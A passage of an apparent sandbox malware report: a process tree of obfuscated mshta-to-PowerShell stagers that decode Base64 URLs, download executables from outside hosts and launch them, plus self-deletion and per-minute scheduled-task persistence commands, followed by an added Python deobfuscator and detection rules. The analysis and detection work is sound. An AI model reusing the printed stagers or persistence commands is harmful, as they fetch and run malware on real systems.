'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          PID: 2344
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
        [5] C:\Users\Public\qdt.exe
            Command line: "C:\Users\Public\qdt.exe"
            PID: 4212
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
            - Modifies registry class
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\SysWOW64\WScript.exe
              Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rmfigo.vbs"
              PID: 4692
            [7] C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
                Command line: "C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe"
                PID: 4824
                - Executes dropped EXE
                - Suspicious use of SetThreadContext
                - Modifies registry class
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
              [8] C:\Windows\SysWOW64\WScript.exe
                  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dvdljtaccvivylcfphls.vbs"
                  PID: 1796
                [9] C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe
                    Command line: "C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe"
                    PID: 3204
                    - Executes dropped EXE
                    - Suspicious use of SetThreadContext
                    - Suspicious behavior: EnumeratesProcesses
                    - Suspicious use of AdjustPrivilegeToken
                  [10] C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe
                      Command line: C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe
                      PID: 4596
                      - Executes dropped EXE
                      - Loads dropped DLL
                      - Checks processor information in registry
                    [11] C:\Windows\SysWOW64\cmd.exe
                        Command line: "C:\Windows\System32\cmd.exe" /c taskkill /pid 4596 & erase C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe & RD /S /Q C:\\ProgramData\\039961947608230\\* & exit
                        PID: 4660
                      [12] C:\Windows\SysWOW64\taskkill.exe
                          Command line: taskkill /pid 4596
                          PID: 4996
                          - Kills process with taskkill
                          - Suspicious use of AdjustPrivilegeToken
              [8] C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
                  Command line: C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
                  PID: 2020
                  - Executes dropped EXE
                  - Loads dropped DLL
                  - Accesses Microsoft Outlook profiles
                  - Checks processor information in registry
                  - Suspicious behavior: EnumeratesProcesses
                  - outlook_office_path
                  - outlook_win_path
                [9] C:\Users\Admin\AppData\Local\Temp\cc.exe
                    Command line: "C:\Users\Admin\AppData\Local\Temp\cc.exe"
                    PID: 4184
                    - Executes dropped EXE
                    - Suspicious use of SetThreadContext
                    - Modifies system certificate store
                  [10] C:\Users\Admin\AppData\Local\Temp\cc.exe
                      Command line: C:\Users\Admin\AppData\Local\Temp\cc.exe
                      PID: 1556
                      - Executes dropped EXE
                    [11] C:\Windows\SysWOW64\schtasks.exe
                        Command line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
                        PID: 4272
                        - Creates scheduled task(s)
                [9] C:\Users\Admin\AppData\Local\Temp\pm.exe
                    Command line: "C:\Users\Admin\AppData\Local\Temp\pm.exe"
                    PID: 4484
                    - Executes dropped EXE
                    - Adds Run key to start application
                    - Suspicious use of SetThreadContext
                    - Suspicious behavior: EnumeratesProcesses
                    - Suspicious use of AdjustPrivilegeToken
                  [10] C:\Users\Admin\AppData\Local\Temp\aspnet_compiler.exe
                      Command line: C:\Users\Admin\AppData\Local\Temp\aspnet_compiler.exe
                      PID: 5040
                      - Executes dropped EXE
                      - Suspicious use of AdjustPrivilegeToken
                [9] C:\Windows\SysWOW64\cmd.exe
                    Command line: "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Uxqcrfgglyzuwogibeigruaconsoleapp12.exe"
                    PID: 4488
                  [10] C:\Windows\SysWOW64\timeout.exe
                      Command line: C:\Windows\system32\timeout.exe 3
                      PID: 4564
                      - Delays execution with timeout.exe
          [6] C:\Users\Admin\AppData\Local\Temp\qdt.exe
              Command line: C:\Users\Admin\AppData\Local\Temp\qdt.exe
              PID: 4848
              - Executes dropped EXE
            [7] C:\Windows\SysWOW64\WerFault.exe
                Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 912
                PID: 4892
                - Suspicious use of NtCreateProcessExOtherParentProcess
                - Program crash
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\mshta.exe
        Command line: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\60C9.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        PID: 400
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Users\Public\sko.exe"C:\Users\Public\sko.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4156 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rmfigo.vbs"6⤵PID:4704
-
C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe"C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4836 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dvdljtaccvivylcfphls.vbs"8⤵PID:1012
-
C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe"C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe"9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3628 -
C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exeC:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe10⤵
- Executes dropped EXE
PID:4616 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 120811⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4820
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exeC:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe8⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2344
-
-
C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exeC:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe8⤵
- Executes dropped EXE
PID:4296
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sko.exeC:\Users\Admin\AppData\Local\Temp\sko.exe6⤵
- Executes dropped EXE
PID:4884
-
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
PID:596
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\60C9.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:344 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2012
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\60C9.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1264
-
-
-
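The three mshta-spawned PowerShell commands above (PIDs 1768, 2012 and 1264) are one template with fresh random names each time: every sensitive string is built from `[char]0xNN+[char]0xNN` runs, `Set-Alias` (`sAL`) is used to hide `IEX` and `sApS` (Start-Process) behind random alias names, and the download URL is a Base64 literal decoded at run time. The Python below is an added example written for this page; it is not part of the sandbox report or of the malware. It folds those constants statically instead of executing anything, so it is safe to run on a sample. The embedded input is the PID 1768 argument string copied from the tree; all function names are the editor's.

```python
"""Static deobfuscator for the mshta -> powershell stagers in the tree above.

Layers handled: [char]0xNN+[char]0xNN... string building, Set-Alias chains
with random alias names, and a Base64 download URL. Nothing executes
PowerShell; the text is rewritten with regexes and constant-folded.
"""
import base64
import binascii
import re

# Sample input: the PowerShell argument string of PID 1768 (mshta b1.hta ->
# powershell.exe), copied statement by statement from the process tree above.
STAGER_PID_1768 = (
    "-ExecutionPolicy UnRestricted -Window 1 [void] $null;"
    "$wdxubevfic = Get-Random -Min 3 -Max 4;"
    "$qidanupkvwj = ([char[]]([char]97..[char]122));"
    "$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});"
    "$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;"
    "$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;"
    "$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;"
    "$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;"
    "$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62"
    "+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;"
    "ftdrmoulpbhgsc rfmngajuyepx $xzrhm;"
    "$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55"
    "+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;"
    "ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;"
    "$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';"
    "$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));"
    "$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);"
    "[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;"
    "$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);"
    'foreach($tgmqlbc in $pnsva){$null = $_}""'
)

CHAR_ONE = re.compile(r"\[char\](0x[0-9a-f]+|\d+)", re.I)
CHAR_CHAIN = re.compile(r"\[char\](?:0x[0-9a-f]+|\d+)(?:\s*\+\s*\[char\](?:0x[0-9a-f]+|\d+))*", re.I)
ASSIGN = re.compile(r"^\$(\w+)\s*=\s*(.+)$")
PIPE_TO = re.compile(r"^(.*)\|\s*(\w+)\s*$")
ALIAS_DEF = re.compile(r"^(\w+)\s+(\w+)\s+(\$\w+|'[^']*')$")
INVOKE = re.compile(r"^(\w+)\s+(\$\w+)$")
TOKEN = re.compile(r"'[^']*'|[^'+]+")
LITERAL = re.compile(r"'([^']*)'")
CMDLETS = {"sal": "Set-Alias", "iex": "Invoke-Expression", "saps": "Start-Process"}


def decode_char_chains(script):
    """Rewrite every [char]0xNN+[char]0xNN... run as a single-quoted literal."""
    def to_literal(m):
        return "'" + "".join(chr(int(v, 0)) for v in CHAR_ONE.findall(m.group(0))) + "'"
    return CHAR_CHAIN.sub(to_literal, script)


def canonical(name, aliases):
    """Follow user-defined aliases down to the built-in cmdlet they stand for."""
    seen = set()
    while name.lower() in aliases and name.lower() not in seen:
        seen.add(name.lower())
        name = aliases[name.lower()]
    return CMDLETS.get(name.lower(), name)


def fold(expr, vars_):
    """Constant-fold a '+' concatenation of quoted literals and $variables.
    Unknown variables become <$name> placeholders; any other token (cmdlet
    call, method call, pipeline) makes the expression non-constant -> None."""
    out = []
    for tok in (t.strip() for t in TOKEN.findall(expr)):
        if not tok:
            continue
        if len(tok) >= 2 and tok[0] == tok[-1] == "'":
            out.append(tok[1:-1])
        elif re.fullmatch(r"\$\w+", tok):
            out.append(vars_.get(tok[1:], "<" + tok + ">"))
        else:
            return None
    return "".join(out)


def decode_b64_literal(text):
    """Return the decoded string if text is Base64 of printable ASCII, else None."""
    try:
        out = base64.b64decode(text, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    return out if out and out.isprintable() else None


def analyse(script):
    """Fold the stager's constants; report URL, aliases, downloader and launch step."""
    script = decode_char_chains(script)
    vars_, aliases, launch = {}, {}, None
    for stmt in (s.strip() for s in script.split(";")):
        if not stmt:
            continue
        if (m := ASSIGN.match(stmt)):
            rhs = m.group(2)
            pipe = PIPE_TO.match(rhs)
            if pipe and canonical(pipe.group(2), aliases) == "Invoke-Expression":
                rhs = pipe.group(1)  # '...'|IEX on a literal yields the literal itself
            value = fold(rhs, vars_)
            if value is not None:
                vars_[m.group(1)] = value
        elif (m := ALIAS_DEF.match(stmt)) and canonical(m.group(1), aliases) == "Set-Alias":
            aliases[m.group(2).lower()] = fold(m.group(3), vars_) or m.group(3)
        elif (m := INVOKE.match(stmt)):
            launch = (canonical(m.group(1), aliases), fold(m.group(2), vars_))
    decoded = [d for d in (decode_b64_literal(s) for s in LITERAL.findall(script)) if d]
    new_obj = re.search(r"New-Object\s+(\$\w+|'[^']*')", script)
    rnd = re.search(r"Get-Random\s+-Min(?:imum)?\s+(\d+)\s+-Max(?:imum)?\s+(\d+)", script)
    return {
        "urls": [d for d in decoded if d.lower().startswith(("http://", "https://"))],
        "aliases": {a: canonical(a, aliases) for a in aliases},
        "downloader": fold(new_obj.group(1), vars_) if new_obj else None,
        "launch": launch,
        # Get-Random -Maximum is exclusive, so the dropped name length is [min, max-1]
        "name_length": (int(rnd.group(1)), int(rnd.group(2)) - 1) if rnd else None,
    }


if __name__ == "__main__":
    print(analyse(STAGER_PID_1768))
```

For PID 1768 the fold gives: download `http://pdshcjvnv.ug/zxcvb.exe` with `Net.WebClient`, write it to `$env:PUBLIC\<three random letters>.exe` (the `-Min 3 -Max 4` range always yields 3), then `Start-Process` it. That is exactly what the tree records as the child of PID 1768: `C:\Users\Public\sko.exe` (PID 4156). The other two stagers differ only in alias names and URL: the PID 2012 one decodes to `http://bit.do/fqhJD` and the PID 1264 one to `http://rbcxvnb.ug/zxcvb.exe`; only the first two carry the "Blocklisted process makes network request" signature in this run.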
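Four behaviours in this tree are cheap to detect from command lines alone: the per-minute scheduled task (`/sc minute /mo 1`) whose action lives under `AppData` and reuses the name of the System32 binary `fodhelper.exe`; the two `cmd.exe` chains that kill a PID or wait with `timeout` and then `erase`/`del` the parent's own dropped executable; `aspnet_compiler.exe` (a .NET Framework binary that normally lives under `%SystemRoot%\Microsoft.NET`) executing from `Temp`; and `mshta.exe` spawning PowerShell whose argument carries `-ExecutionPolicy`, `[char]0x` string building and `FromBase64String`. The rules below are an added example written for this page, not part of the sandbox report or of any product. The five malicious records are copied from the tree (the PowerShell line abridged to the statements the rule inspects); the benign control record (PID 9001) and all rule names are the editor's.

```python
"""Command-line detection rules for the living-off-the-land patterns in the tree above."""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    parent_image: str
    image: str
    cmdline: str


USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData)\\", re.I)
# Names of binaries that ship under %SystemRoot% (System32 / Microsoft.NET);
# the same file name executing from anywhere else is a masquerade.
SYSTEM_BINARY_NAMES = {"fodhelper.exe", "aspnet_compiler.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
OBFUSCATION_MARKERS = ("-executionpolicy", "[char]0x", "frombase64string", "net.webclient", "downloaddata")

# Constructed from the tree above: parent image, image and command line of five
# processes (the PowerShell line abridged to the statements the rule inspects),
# plus one made-up benign control (PID 9001) that must not fire.
SAMPLE_TREE = [
    Proc(4660, r"C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe", r"C:\Windows\SysWOW64\cmd.exe",
         r'"C:\Windows\System32\cmd.exe" /c taskkill /pid 4596 & erase C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe & RD /S /Q C:\\ProgramData\\039961947608230\\* & exit'),
    Proc(4272, r"C:\Users\Admin\AppData\Local\Temp\cc.exe", r"C:\Windows\SysWOW64\schtasks.exe",
         r'/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"'),
    Proc(5040, r"C:\Users\Admin\AppData\Local\Temp\pm.exe", r"C:\Users\Admin\AppData\Local\Temp\aspnet_compiler.exe",
         r"C:\Users\Admin\AppData\Local\Temp\aspnet_compiler.exe"),
    Proc(4488, r"C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe", r"C:\Windows\SysWOW64\cmd.exe",
         r'"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Uxqcrfgglyzuwogibeigruaconsoleapp12.exe"'),
    Proc(1768, r"C:\Windows\SysWOW64\mshta.exe", r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
         r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 '
         r"$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;"
         r"$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));"
         r"$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua)"),
    Proc(9001, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\schtasks.exe",
         r'schtasks /create /sc daily /tn "Backup" /tr "C:\Program Files\Backup\run.exe"'),
]


def basename(path):
    return ntpath.basename(path).lower()


def rule_high_freq_task(p):
    """schtasks creating a task that fires every few minutes from a user-writable path."""
    if basename(p.image) != "schtasks.exe" or "/create" not in p.cmdline.lower():
        return None
    every = re.search(r"/sc\s+minute\s+/mo\s+(\d+)", p.cmdline, re.I)
    action = re.search(r'/tr\s+"?([^"]+)"?', p.cmdline, re.I)
    if not (every and int(every.group(1)) <= 5 and action and USER_WRITABLE.search(action.group(1))):
        return None
    target = action.group(1).strip()
    note = " (name of a Windows system binary, outside %SystemRoot%)" if basename(target) in SYSTEM_BINARY_NAMES else ""
    return f"persistence: task every {every.group(1)} min runs {target}{note}"


def rule_self_delete(p):
    """cmd.exe chain that kills a PID or waits, then deletes a file (typically its own parent)."""
    if basename(p.image) != "cmd.exe":
        return None
    c = p.cmdline.lower()
    kills = re.search(r"taskkill\s+/pid\s+(\d+)", c)
    waits = re.search(r"timeout(?:\.exe)?\s+(\d+)", c)
    deletes = re.search(r"\b(?:del|erase)\s+\"?([^&\"]+)", c)
    if not deletes or not (kills or waits):
        return None
    target = deletes.group(1).strip()
    how = f"kills pid {kills.group(1)}" if kills else f"waits {waits.group(1)}s"
    whose = "its own parent " if basename(p.parent_image) in target else ""
    return f"self-delete: {how}, then deletes {whose}{target}"


def rule_masquerade(p):
    """A Windows system binary name executing from outside %SystemRoot%."""
    if basename(p.image) in SYSTEM_BINARY_NAMES and "\\windows\\" not in p.image.lower():
        return f"masquerade: {basename(p.image)} executing from {p.image}"
    return None


def rule_script_host_downloader(p):
    """mshta/wscript/cscript spawning PowerShell that carries obfuscation and download markers."""
    if basename(p.image) != "powershell.exe" or basename(p.parent_image) not in SCRIPT_HOSTS:
        return None
    hits = [m for m in OBFUSCATION_MARKERS if m in p.cmdline.lower()]
    if len(hits) < 2:
        return None
    return f"downloader: {basename(p.parent_image)} -> powershell with {', '.join(hits)}"


RULES = (rule_high_freq_task, rule_self_delete, rule_masquerade, rule_script_host_downloader)


def scan(procs):
    """Map pid -> list of findings for every process that trips at least one rule."""
    findings = {}
    for p in procs:
        hits = [h for h in (rule(p) for rule in RULES) if h]
        if hits:
            findings[p.pid] = hits
    return findings


if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_TREE).items():
        print(pid, hits)
```

Each rule is deliberately narrow: the task rule needs both a sub-five-minute interval and a user-writable action path, and the self-delete rule needs a kill or a wait in the same chain as the delete, which is what separates the chains at PIDs 4660 and 4488 from an ordinary cleanup script. The parent image is what lets the self-delete rule say "its own parent": in both cases the file being deleted is the executable that spawned the cmd.exe.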